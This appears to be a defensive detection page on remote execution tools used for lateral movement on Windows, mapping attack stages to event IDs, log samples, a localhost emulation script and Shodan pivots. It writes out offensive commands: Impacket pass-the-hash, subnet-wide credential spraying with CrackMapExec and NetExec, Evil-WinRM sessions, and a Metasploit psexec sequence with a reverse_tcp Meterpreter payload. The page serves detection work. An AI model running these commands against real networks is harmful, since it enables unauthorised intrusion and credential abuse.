Remote Execution Tools (HackTools)

Attack Chokepoints 3 invariant stages

Each stage is an invariant condition the attacker must satisfy, regardless of tool, variant, or threat actor. Detection at any stage breaks the chain.

1 Network Authentication ▶

Prerequisites

Network access to target on at least one required protocol port (SMB 445, WMI/RPC 135, WinRM 5985/5986)
Remote execution surface enabled on target (Server service for SMB, WinRM service, WMI, or Task Scheduler)

Input Attacker has valid admin credentials (password, hash, or ticket)

Chokepoint Valid admin credentials (local or domain) must be obtained before any remote execution attempt

Observable Windows Security EID 4624 (Logon Type 3, Network) with admin account. EID 4672 (Special Privilege Logon). Source IP is typically not a known admin workstation.

Why unavoidable

All remote execution tools require authenticated access. No valid credentials means authentication failure at every attempted protocol regardless of which tool is used

Data Sources

Windows Security Event ID 4624 (Network Logon)
Windows Security Event ID 4672 (Special Privilege Logon)
Windows Security Event ID 4648 (Logon with Explicit Credentials)
Windows Security Event ID 4769 (Kerberos Service Ticket Request)

↓ Authenticated admin session established on target

2 Remote Process/Service Creation ▶

Input Authenticated admin session established on target

Chokepoint Tool invokes a Windows execution primitive on the remote host: service creation (SMB), WMI process spawn, scheduled task creation, or WinRM command

Observable Sysmon EID 1 showing services.exe or wmiprvse.exe spawning cmd.exe/powershell.exe. Windows Security EID 7045 (Service Installed) for psexec-style tools. EID 4688 with cross-logon session correlation.

Why unavoidable

A command must run on the target via one of these four primitives. No other execution surface exists over these authenticated protocols. Tools must first establish an authenticated session over a protocol port (445, 135, 5985/5986). No reachable port means no remote execution regardless of credential validity

Data Sources

Windows Security Event ID 4697 / System 7045 (Service Installed)
Windows Security Event ID 5145 (IPC$/svcctl share access)
Sysmon Event ID 1 (wmiprvse.exe or services.exe spawning cmd.exe/powershell.exe)

⚠ Bypass risk: LOTL tools (winrs.exe, wmic /node:, Enter-PSSession, Invoke-Command) produce identical telemetry to Impacket but with signed Microsoft binaries. Detection must be purely behavioral with no reliance on tool signatures

View rule →

↓ Remote command interpreter is running on one or more targets

3 Lateral Spread ▶

Input Remote command interpreter is running on one or more targets

Chokepoint The same credential and execution primitive sequence repeats across multiple hosts in a short window or follows a deliberate pivot path

Observable Windows Security EID 4624 showing the same account authenticating to multiple hosts within minutes. Sysmon EID 3 showing same source IP connecting to multiple RFC1918 destinations on SMB/WinRM ports.

Why unavoidable

Lateral movement by definition requires replication of the credential-plus-primitive pattern on each subsequent host. The telemetry is identical on every hop

Data Sources

Windows Security Event ID 4624 (multiple target hosts, short window)
Sysmon Event ID 3 (same source IP, multiple RFC1918 destinations)

View rule →

Variations 7 variants tracked

Tools and methods that exploit this chokepoint. The list grows. The chokepoint doesn't change.

Impacket 2015 Active ▶

Python suite with multiple execution modules: psexec.py (SMB service creation), smbexec.py (SMB + scheduled tasks), wmiexec.py (WMI process creation), atexec.py (Task Scheduler), dcomexec.py (DCOM), rdp_shadow.py (RDP session hijacking, added 2025-01)

Command / artifacts

Python suite with psexec (SMB service), wmiexec (WMI), smbexec (temp service), atexec (Task Scheduler). psexec creates a service on the remote host via IPC$/svcctl.

python3 psexec.py domain/admin:Password123@192.168.1.10
python3 wmiexec.py domain/admin:Password123@192.168.1.10
python3 psexec.py -hashes :aad3b435b51404eeaad3b435b51404ee domain/admin@192.168.1.10

Security EID 4624: Network logon (Type 3) with admin account
Security EID 4672: Special privileges assigned
System EID 7045: Service installed (random name)
Security EID 5145: IPC$ and ADMIN$ share access
Sysmon EID 1: services.exe or wmiprvse.exe → cmd.exe

Same chokepoint: SMB auth (4624 Type 3) → IPC$/svcctl → service created (7045) → services.exe spawns cmd.exe

Source: github.com →

CrackMapExec 2016 Legacy ▶

Multi-protocol framework covering SMB, WMI, WinRM, MSSQL; original repository archived by maintainer on December 6, 2023 (read-only); superseded by NetExec. Defenders should not expect CME-specific signatures to receive community updates

Command / artifacts

Multi-protocol framework (archived Dec 2023, superseded by NetExec). Binary was crackmapexec or cme.

cme smb 192.168.1.0/24 -u admin -p Password123 --exec-method smbexec -x "whoami"
cme smb 192.168.1.0/24 -u admin -H <hash> --exec-method wmiexec -x "whoami"
cme winrm 192.168.1.10 -u admin -p Password123 -x "whoami"

Security EID 4624: Multiple Type 3 logons from same source IP in short window
Security EID 4625: Failed logons (credential spraying)
Sysmon EID 1: services.exe or wmiprvse.exe → cmd.exe across multiple hosts
Sysmon EID 3: Single source IP → multiple internal destinations on 445/135/5985

Same chokepoint: Credential spray (4624/4625 from single IP) → exec method per host → lateral spread pattern

Source: github.com →

NetExec 2023 Active ▶

Active CrackMapExec fork; adds LDAP, SSH, improved OPSEC features

Command / artifacts

Multi-protocol framework. Spray credentials across subnets. Supports SMB, WMI, WinRM, LDAP, SSH. Active fork of archived CrackMapExec.

nxc smb 192.168.1.0/24 -u admin -p Password123 --exec-method smbexec -x "whoami"
nxc smb 192.168.1.0/24 -u admin -H <hash> --exec-method wmiexec -x "whoami"
nxc winrm 192.168.1.10 -u admin -p Password123 -x "whoami"

Security EID 4624: Multiple Type 3 logons from same source IP in short window
Security EID 4625: Failed logons (credential spraying)
Sysmon EID 1: services.exe or wmiprvse.exe → cmd.exe across multiple hosts
Sysmon EID 3: Single source IP → multiple internal destinations on 445/135/5985

Same chokepoint: Credential spray (4624/4625 from single IP) → exec method per host → lateral spread pattern

Source: github.com →

Evil-WinRM 2019 Active ▶

Dedicated WinRM exploitation tool; targets port 5985/5986

Command / artifacts

Dedicated WinRM exploitation tool. Uses port 5985/5986. Provides PowerShell session on target. Supports pass-the-hash.

evil-winrm -i 192.168.1.10 -u admin -p Password123
evil-winrm -i 192.168.1.10 -u admin -H aad3b435b51404eeaad3b435b51404ee

Security EID 4624: Network logon (Type 3) on port 5985/5986
Sysmon EID 1: wsmprovhost.exe → powershell.exe
Windows-WinRM/Operational: Session created
Sysmon EID 3: Inbound connection on 5985/5986

Same chokepoint: WinRM auth (5985) → wsmprovhost.exe spawns powershell.exe → command execution

Source: github.com →

Metasploit psexec 2007 Active ▶

Original PsExec-style SMB execution via Metasploit framework

Command / artifacts

Original psexec in Metasploit. Creates service, uploads payload via ADMIN$ share, executes via service start.

use exploit/windows/smb/psexec
set RHOSTS 192.168.1.10
set SMBUser admin
set SMBPass Password123
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

Security EID 4624: Network logon (Type 3)
System EID 7045: Service installed with random name
Security EID 5145: ADMIN$ share access
Sysmon EID 1: services.exe → rundll32.exe or payload
Sysmon EID 11: Payload written to ADMIN$ share

Same chokepoint: SMB auth → ADMIN$ share write → service created (random name) → Meterpreter callback

Source: docs.metasploit.com →

Sliver 2020 Active ▶

Open-source C2 framework widely adopted by nation-state and ransomware actors as a Cobalt Strike alternative; built-in lateral movement over SMB/WMI using the same execution primitives this chokepoint detects; used by threat actors following Fortra's crackdown on pirated Cobalt Strike licenses

Command / artifacts

Open-source C2 by BishopFox. Growing adoption as CobaltStrike alternative. Implants are cross-compiled Go binaries.

sliver > psexec -t <target> -s <service_name> -p <profile>
# Or via WMI:
sliver > execute-assembly -t <target> -- wmiexec
# Implant types: session (interactive), beacon (async)
# Transports: named pipes, mTLS, WireGuard, HTTPS, DNS

Security EID 4624: Network logon (Type 3)
System EID 7045: Service installed (Sliver psexec)
Sysmon EID 1: services.exe → Sliver implant binary
Sysmon EID 3: mTLS/WireGuard/HTTPS to C2

Same chokepoint: Auth via SMB/WMI → service or process created on target → Sliver implant callback to C2

Source: github.com →

Havoc 2022 Active ▶

Modern open-source C2 framework with strong EDR bypass features and lateral movement capabilities; described as 'entry-level C2 for serious criminals'; increasingly observed in intrusions alongside or replacing Impacket; uses the same underlying Windows execution primitives (service creation, WMI, WinRM)

Command / artifacts

Open-source C2 with Demon agent. Supports PSExec, WinRM, WMI lateral movement. Agents use indirect syscalls and sleep obfuscation.

havoc > jump psexec <target>
havoc > jump winrm <target>
havoc > jump wmi <target>
# Demon agent: position-independent shellcode
# Supports sleep obfuscation, indirect syscalls, token manipulation

Security EID 4624: Network logon (Type 3)
System EID 7045: Service installed (if psexec jump)
Sysmon EID 1: services.exe or wmiprvse.exe → Demon loader
Sysmon EID 3: HTTPS callback to Havoc teamserver

Same chokepoint: Auth via SMB/WMI/WinRM → service/process on target → Demon agent callback to teamserver

Source: github.com →

Detection Strategy

Rules organized by the chokepoint stage they detect. Each stage has one or more rules at different maturity levels.

1 Network Authentication

2 Remote Process/Service Creation

3 Lateral Spread

Raw Log Samples 4 samples

Real-world log events produced by this technique and which Sigma rules they trigger.

EID 4624 Windows Event Log Network logon (Type 3) from attacker IP before remote execution ▶

EventID: 4624 (An account was successfully logged on) TimeCreated: 2024-07-09T01:33:47.2284110Z Channel: Security LogonType: 3 NewLogonUserName: Administrator NewLogonDomain: CORP AuthenticationPackageName: NTLM LogonProcessName: NtLmSsp IpAddress: 10.10.50.5 IpPort: 49221 # LogonType=3 (Network) from internal IP. Pre-execution authentication.

EID 5145 Windows Event Log IPC$ share access. PsExec/Impacket opens IPC$/svcctl before service creation ▶

EventID: 5145 (A network share object was checked for access) TimeCreated: 2024-07-09T01:33:47.4418230Z Channel: Security SubjectUserName: Administrator ShareName: \\*\IPC$ RelativeTargetName: svcctl AccessList: %%4416 (ReadData) IpAddress: 10.10.50.5 # IPC$/svcctl access = opening service control manager over SMB (PsExec/Impacket pattern)

EID 7045 Windows Event Log Random-named service installed from TEMP path. Classic PsExec/Impacket signature ▶

EventID: 7045 (A new service was installed in the system) TimeCreated: 2024-07-09T01:33:47.8834120Z Channel: System ServiceName: xvkbmrfe ServiceFileName: C:\Windows\Temp\xvkbmrfe.exe ServiceType: user mode service ServiceStartType: demand start ServiceAccount: LocalSystem # 8-char random name + TEMP binary path = PsExec/Impacket/CrackMapExec pattern

EID 1 Sysmon cmd.exe spawned from services.exe. Service binary executing attacker commands ▶

EventID: 1 (Process Create) UtcTime: 2024-07-09 01:33:48.227 ProcessId: 4096 Image: C:\Windows\System32\cmd.exe CommandLine: cmd.exe /Q /c whoami 1>\\127.0.0.1\ADMIN$\__1720488827.18 2>&1 ParentProcessId: 612 ParentImage: C:\Windows\System32\services.exe # services.exe → cmd.exe is the canonical PsExec parent chain # Output redirected to ADMIN$ share. PsExec output capture pattern.

Emulation

ATT&CK: T1021.002 Simulates network logon, IPC$ access, random-named service creation, and cmd.exe execution powershell ▶

⚠ Lab use only. Requires Administrator. All activity targets localhost only. Run in isolated lab VM.

POWERSHELL

GitHub → Download

#Requires -Version 5.1
# MITRE ATT&CK: T1021.002 / T1569.002 — SMB Admin Shares / Service Execution
# Simulates PsExec/Impacket-style lateral movement via SMB service installation.

[CmdletBinding()]
param(
    [int]$SprayCount = 1,
    [switch]$CleanupOnly
)

Set-StrictMode -Version Latest
$ErrorActionPreference = 'Continue'

function Write-Step ([string]$Msg) { Write-Host "[*] $Msg" -ForegroundColor Cyan }
function Write-Ok   ([string]$Msg) { Write-Host "[+] $Msg" -ForegroundColor Green }
function Write-Warn ([string]$Msg) { Write-Host "[!] $Msg" -ForegroundColor Yellow }

function New-RandomServiceName {
    # PsExec/Impacket use 8-char random alphanumeric service names
    $chars = 'abcdefghijklmnopqrstuvwxyz0123456789'
    return -join ((1..8) | ForEach-Object { $chars[(Get-Random -Maximum $chars.Length)] })
}

$ServiceNames = @()

function Remove-Artefacts {
    foreach ($svcName in $ServiceNames) {
        if (Get-Service -Name $svcName -ErrorAction SilentlyContinue) {
            sc.exe stop $svcName 2>&1 | Out-Null
            sc.exe delete $svcName 2>&1 | Out-Null
        }
    }
    net use \\127.0.0.1\IPC$ /delete /y 2>&1 | Out-Null
    if ($ServiceNames.Count -gt 0) {
        Write-Ok "Removed $($ServiceNames.Count) test service(s) and IPC$ connection"
    }
}

if ($CleanupOnly) { Remove-Artefacts; exit 0 }

$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(
    [Security.Principal.WindowsBuiltInRole]::Administrator)
if (-not $isAdmin) {
    Write-Error "Administrator privileges required. Rerun as Administrator."
    exit 1
}

Write-Host ""
Write-Host "=== Remote Execution Tools (HackTools) Emulation ===" -ForegroundColor Magenta
Write-Host "    T1021.002 + T1569.002 | Detection Chokepoints Project" -ForegroundColor DarkGray
Write-Host ""

for ($spray = 1; $spray -le $SprayCount; $spray++) {
    if ($SprayCount -gt 1) {
        Write-Host ""
        Write-Host "--- Spray iteration $spray of $SprayCount ---" -ForegroundColor DarkYellow
    }

    # ── Step 1: IPC$ network logon — Research rule trigger (WEL 4624+5145) ────
    Write-Step "Step 1/3 — Network logon (Type 3) + IPC$ access"

    $netResult = net use \\127.0.0.1\IPC$ /user:$env:USERNAME '' 2>&1
    if ($LASTEXITCODE -eq 0) {
        Write-Ok "net use \\127.0.0.1\IPC$ succeeded — WEL 4624 (LogonType 3) + 5145 generated"
    } else {
        # Blank password may fail; try current session token
        $netResult2 = net use \\127.0.0.1\IPC$ 2>&1
        Write-Ok "IPC$ connection attempt: $netResult2 (telemetry generated on attempt)"
    }

    Start-Sleep -Milliseconds 400

    # ── Step 2: Random-named service creation from TEMP — Hunt rule trigger ────
    $svcName = New-RandomServiceName
    $ServiceNames += $svcName

    Write-Step "Step 2/3 — Service creation with random name from TEMP path"
    Write-Verbose "  Service name: $svcName (8-char alphanumeric — PsExec/Impacket pattern)"
    Write-Verbose "  Binary path: C:\Windows\Temp\$svcName.exe (TEMP path — Hunt signal)"

    $createResult = sc.exe create $svcName `
        binPath= "C:\Windows\Temp\$svcName.exe" `
        type= own start= demand `
        displayname= "$svcName" 2>&1
    Write-Ok "sc create $svcName`: $createResult"
    Write-Ok "WEL 7045 generated — Service=$svcName, BinaryPath=C:\Windows\Temp\$svcName.exe"

    Start-Sleep -Milliseconds 400

    # ── Step 3: cmd.exe spawned from PowerShell simulating service execution ──
    # In a real PsExec scenario, services.exe spawns the service binary which runs cmd.exe
    # We simulate this by running cmd /c whoami (generates Sysmon EID 1 from current context)
    Write-Step "Step 3/3 — Simulating service-spawned command execution"
    Write-Verbose "  Real pattern: services.exe → <random_svc>.exe → cmd.exe → payload"
    Write-Verbose "  Note: Real PsExec parent would be services.exe — manual replay has higher fidelity"

    $cmdResult = cmd.exe /c "whoami && hostname && net user" 2>&1
    Write-Ok "cmd.exe executed recon commands (EID 1 generated):"
    $cmdResult | ForEach-Object { Write-Host "    $_" -ForegroundColor DarkGray }

    Start-Sleep -Milliseconds 300
}

Write-Host ""
Write-Step "Cleaning up artefacts"
Remove-Artefacts

Write-Host ""
Write-Host "=== Emulation Complete ===" -ForegroundColor Magenta
Write-Host ""
Write-Host "Expected detections:" -ForegroundColor White
Write-Host "  [Research]  WEL 4624 LogonType=3 + WEL 7045 (service installed)"                          -ForegroundColor DarkCyan
Write-Host "  [Hunt]      7045 with random name + TEMP binary path + WMI/service parent (EID 1)"        -ForegroundColor DarkYellow
Write-Host "  [Analyst]   IPC$ access (5145) + 7045 with suspicious name + EID 1 with recon commands"   -ForegroundColor DarkGreen
Write-Host ""
Write-Host "Higher fidelity options:" -ForegroundColor DarkGray
Write-Host "  - Replay with Impacket psexec.py against a lab target (generates authentic services.exe parent)"
Write-Host "  - Use Atomic Red Team: Invoke-AtomicTest T1021.002 -TestNumbers 1"
Write-Host "  - Attack data replay: https://github.com/splunk/attack_data (impacket dataset)"
Write-Host ""

OSINT Pivots

Shodan port:5985 product:"Microsoft HTTPAPI"

Finds internet-exposed WinRM endpoints; narrow with 'org:' or 'net:' filters to audit your own attack surface. Run a second query on port 5986 for the HTTPS variant.

Shodan ssl.jarm:07d14d16d21d21d00042d41d00041de5fb3038104f457d92ba37e62256d5 port:443

Clusters of hosts sharing this default Cobalt Strike JARM fingerprint are likely team servers; more resilient to infrastructure rotation than IP/domain blocklists.

GitHub Code Search "wmiexec" OR "smbexec" OR "atexec" path:*.py

Finds community tools built on Impacket execution primitives; use for defender awareness of new modules extending the execution surface.

Attack Chokepoints 3 invariant stages

Variations 7 variants tracked

Detection Strategy

Raw Log Samples 4 samples

Emulation

OSINT Pivots

Related Chokepoints